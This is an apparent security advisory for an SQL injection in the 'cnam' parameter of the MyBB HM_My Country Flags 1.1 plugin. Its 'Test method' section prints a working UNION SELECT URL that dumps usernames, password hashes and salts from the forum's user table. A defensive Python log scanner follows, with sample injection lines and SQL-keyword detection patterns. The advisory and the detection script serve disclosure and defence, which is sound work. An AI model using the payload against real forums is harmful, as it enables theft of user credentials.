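MyBB HM_My Country Flags Plugin 'cnam' Parameter SQL Injection Vulnerability


Published: 2012-12-24
Updated: 2012-12-28

Affected systems:
MyBB HM_My Country Flags 1.1
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57056

The HM_My Country Flags plugin displays country flags in the postbit and lists users by nationality.

inc/plugins/hmflags.php in version 1.1 of the HM_My Country Flags plugin does not properly validate the "cnam" parameter passed to misc.php before using it in an SQL query. By injecting arbitrary SQL code, an attacker can manipulate the database.

<*Source: JoinSe7en

  Links: http://www.exploit-db.com/exploits/23624/
         http://secunia.com/advisories/51644/
 *>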

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
http://www.example.com/forum/misc.php?action=hmflags&cnam=Belgium'&pf=5

http://www.example.com/forum/misc.php?action=hmflags&cnam=-Belgium'+UNION SELECT 1,group_concat(username,0x3a,password,0x3a,salt,0x3b),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164+FROM+mybb_users WHERE uid=1--+&pf=5

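Recommendation:
--------------------------------------------------------------------------------
Temporary workaround:

If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* Disable the HM_My Country Flags plugin

Vendor patch:

MyBB
 ----
 The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://mods.mybb.com/view/hm-my-country-flags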
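
Until a fixed version is available, web server access logs can be reviewed for requests to misc.php with action=hmflags whose "cnam" value is not a plausible country name. The script below is an added example, not part of the original advisory or the plugin; it assumes combined-format access logs, its function names are hypothetical, and its sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Allowlist for a plausible country name; apostrophes are deliberately excluded.
SAFE_CNAM_RE = re.compile(r"^[A-Za-z .()\-]{1,64}$")
# SQL keywords and comment markers that have no place in a country name.
SQL_TOKEN_RE = re.compile(r"\b(?:union|select|from|where|concat)\b|--|/\*|#", re.I)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Dec/2012:10:00:00 +0000] "GET /forum/misc.php?action=hmflags&cnam=Belgium&pf=5 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [24/Dec/2012:10:01:07 +0000] "GET /forum/misc.php?action=hmflags&cnam=Belgium%27&pf=5 HTTP/1.1" 200 312',
    '203.0.113.9 - - [24/Dec/2012:10:01:40 +0000] "GET /forum/misc.php?action=hmflags&cnam=x%27+UNION+SELECT+1--+&pf=5 HTTP/1.1" 200 900',
    '203.0.113.7 - - [24/Dec/2012:10:02:00 +0000] "GET /forum/misc.php?action=help&cnam=x%27 HTTP/1.1" 200 2048',
]

def cnam_findings(value):
    """Return the reasons a decoded cnam value looks like an injection attempt."""
    findings = []
    if "'" in value or '"' in value:
        findings.append("quote")
    if SQL_TOKEN_RE.search(value):
        findings.append("sql-token")
    if not findings and not SAFE_CNAM_RE.match(value):
        findings.append("unexpected-characters")
    return findings

def scan(lines):
    """Return (line number, decoded cnam, findings) for suspicious hmflags requests."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        params = parse_qs(url.query)  # decodes %xx and '+' before inspection
        # Only the plugin's own entry point is in scope: misc.php?action=hmflags
        if not url.path.endswith("/misc.php") or params.get("action") != ["hmflags"]:
            continue
        for value in params.get("cnam", []):
            findings = cnam_findings(value)
            if findings:
                hits.append((lineno, value, findings))
    return hits

if __name__ == "__main__":
    for lineno, value, findings in scan(SAMPLE_LOG):
        print(f"line {lineno}: cnam={value!r} -> {', '.join(findings)}")
```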
